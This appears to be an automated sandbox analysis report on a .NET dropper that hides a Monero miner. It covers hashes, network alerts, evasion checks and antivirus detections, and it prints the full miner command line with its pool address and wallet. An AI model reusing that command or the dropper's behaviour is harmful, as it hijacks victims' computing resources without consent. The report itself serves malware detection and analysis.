Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 28, 2024, 9:55 a.m.	Jan. 28, 2024, 10:02 a.m.

Size	6.9MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`9539ab89d01b301836b1d22e71dd55ed`
SHA256	`0b091151686ff9bf1f4120ce144f75fc1aacfcad07b14187eb8e85b224a766e7`
CRC32	`BA9CE2B4`
ssdeep	`98304:tvUOUlzvyfQprVfSHy9fierzHjhlTkil3IVcWvy:tvUO6vRvSy1Ll3WJ`
PDB Path	C:\Users\Virtual\Desktop\Biz\RogueMarket\Products\Rogue Miner V2\Review Backup\Er minator\obj\Release\OmegaMiner.pdb
Yara	IsPE32 - (no description) Malicious_Packer_Zero - Malicious Packer PE_Header_Zero - PE File Signature Is_DotNET_EXE - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult UPX_Zero - UPX packed file Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check

z73.exe "C:\Users\test22\AppData\Local\Temp\z73.exe"
2060
- OmegaEngine.exe "C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe" -B --donate-level 1 -o xmr-eu1.nanopool.org:10343 -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero -o -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero
  2328

Name	Response	Post-Analysis Lookup
xmr-eu1.nanopool.org	A 51.15.58.224 A 141.94.23.83 A 146.59.154.106 A 54.37.232.103 A 51.15.193.130 A 163.172.154.142 A 212.47.253.124 A 54.37.137.114 A 51.15.65.182 A 51.89.23.91 A 162.19.224.121	163.172.154.142

IP Address	Status	Action
141.94.23.83	Active	Moloch
146.59.154.106	Active	Moloch
162.19.224.121	Active	Moloch
163.172.154.142	Active	Moloch
164.124.101.2	Active	Moloch
212.47.253.124	Active	Moloch
51.15.193.130	Active	Moloch
51.15.58.224	Active	Moloch
51.15.65.182	Active	Moloch
51.89.23.91	Active	Moloch
54.37.137.114	Active	Moloch
54.37.232.103	Active	Moloch
51.68.137.186	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49165 -> 162.19.224.121:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2033268	ET POLICY Observed DNS Query to Coin Mining Domain (nanopool .org)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49177 -> 51.15.58.224:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49170 -> 51.89.23.91:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49167 -> 51.89.23.91:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49168 -> 141.94.23.83:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49171 -> 51.15.65.182:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49173 -> 163.172.154.142:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49169 -> 162.19.224.121:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49163 -> 212.47.253.124:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49166 -> 212.47.253.124:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49172 -> 51.15.193.130:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49175 -> 51.15.193.130:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49179 -> 146.59.154.106:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49181 -> 51.15.58.224:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49176 -> 54.37.137.114:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49174 -> 54.37.232.103:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49178 -> 51.89.23.91:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49180 -> 163.172.154.142:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49165 -> 162.19.224.121:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49175 -> 51.15.193.130:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49180 -> 163.172.154.142:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49173 -> 163.172.154.142:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49168 -> 141.94.23.83:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49169 -> 162.19.224.121:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49170 -> 51.89.23.91:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49171 -> 51.15.65.182:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49177 -> 51.15.58.224:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49167 -> 51.89.23.91:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49179 -> 146.59.154.106:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49181 -> 51.15.58.224:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49178 -> 51.89.23.91:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49174 -> 54.37.232.103:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49176 -> 54.37.137.114:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49163 -> 212.47.253.124:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49166 -> 212.47.253.124:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation
TCP 192.168.56.103:49172 -> 51.15.193.130:10343	2024792	ET POLICY Cryptocurrency Miner Checkin	Potential Corporate Privacy Violation

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Jan. 28, 2024, 9:48 a.m.			0	0
IsDebuggerPresent Jan. 28, 2024, 9:48 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleA Jan. 28, 2024, 9:56 a.m.	buffer: [2024-01-28 16:36:11.593] C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe: unsupported non-option argument '45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u' console_handle: 0x00000007	1	1	0

This executable has a PDB path (1 event)

pdb_path

C:\Users\Virtual\Desktop\Biz\RogueMarket\Products\Rogue Miner V2\Review Backup\Er minator\obj\Release\OmegaMiner.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Jan. 28, 2024, 9:48 a.m.		1	1	0

Communication to multiple IPs on high port numbers possibly indicative of a peer-to-peer (P2P) or non-standard command and control protocol (11 events)

ip	141.94.23.83
ip	146.59.154.106
ip	162.19.224.121
ip	163.172.154.142
ip	212.47.253.124
ip	51.15.193.130
ip	51.15.58.224
ip	51.15.65.182
ip	51.89.23.91
ip	54.37.137.114
ip	54.37.232.103

Allocates read-write-execute memory (usually to unpack itself) (43 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 2359296 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000e80000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000001040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3641000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3cdb000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002650000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002680000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3642000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3644000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3644000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3644000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef3644000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fffff00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93eca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f7c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93fa6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93edc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93eeb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93f1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93eed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93eda000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ec2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ecb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ecc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:48 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe93ff1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Jan. 28, 2024, 9:49 a.m.	process_identifier: 2060 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94030000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory Jan. 28, 2024, 9:56 a.m.	process_identifier: 2328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 5500928 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00401000 process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 28, 2024, 9:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe parameters: -B --donate-level 1 -o xmr-eu1.nanopool.org:10343 -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero -o -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero filepath: C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 28, 2024, 9:56 a.m.	flags: 14 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 28, 2024, 9:48 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

51.68.137.186

A stratum cryptocurrency mining command was executed (2 events)

cmdline	C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe -B --donate-level 1 -o xmr-eu1.nanopool.org:10343 -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero -o -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero
cmdline	"C:\Users\test22\AppData\Local\Temp\System\OmegaEngine.exe" -B --donate-level 1 -o xmr-eu1.nanopool.org:10343 -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero -o -u 45wadm9cr7Zhd55jSxrB1q9G1744qBc3BTHvxCvuBbMhYbMFodVFV5ZZ4jACjbVZdiJnoyocYV8C6BhCpCUra9Z82p8QT7u -k --coin monero

File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)

Bkav	W32.AIDetectMalware.CS
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
CAT-QuickHeal	Trojan.MsilFC.S29960883
Skyhigh	Artemis!Trojan
ALYac	IL:Trojan.MSILZilla.13621
Cylance	unsafe
VIPRE	IL:Trojan.MSILZilla.13621
Sangfor	CoinMiner.Msil.Agent.V0x9
BitDefender	IL:Trojan.MSILZilla.13621
Cybereason	malicious.26dcf4
Arcabit	IL:Trojan.MSILZilla.D3535
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/CoinMiner.JU potentially unwanted
McAfee	GenericRXAA-FA!9539AB89D01B
Avast	Win32:CoinminerX-gen [Trj]
Kaspersky	HEUR:Trojan.MSIL.Miner.gen
Alibaba	Trojan:MSIL/CoinMiner.7b9eafd7
MicroWorld-eScan	IL:Trojan.MSILZilla.13621
Rising	HackTool.VulnDriver/x64!1.D7DB (CLASSIC)
Emsisoft	IL:Trojan.MSILZilla.13621 (B)
DrWeb	Trojan.MulDrop19.19654
FireEye	Generic.mg.9539ab89d01b3018
Sophos	Generic Reputation PUA (PUA)
Ikarus	PUA.CoinMiner
Jiangmin	Trojan.MSIL.alswv
MAX	malware (ai score=84)
Antiy-AVL	Trojan/MSIL.Miner
Kingsoft	MSIL.Trojan.Miner.gen
Microsoft	Trojan:MSIL/CoinMiner.NL!MTB
ViRobot	Trojan.Win.Z.Miner.7277568
ZoneAlarm	HEUR:Trojan.MSIL.Miner.gen
GData	IL:Trojan.MSILZilla.13621
AhnLab-V3	Trojan/Win.MSILKrypt.R511615
BitDefenderTheta	Gen:NN.ZemsilF.36680.@p0@aS9k6ml
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.BitCoinMiner
Panda	Trj/GdSda.A
Tencent	Malware.Win32.Gencirc.10be9a46
Yandex	Trojan.Miner!epmMOkZEavY
SentinelOne	Static AI - Malicious PE
MaxSecure	Trojan.Malware.73691317.susgen
AVG	Win32:CoinminerX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (W)

z73.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All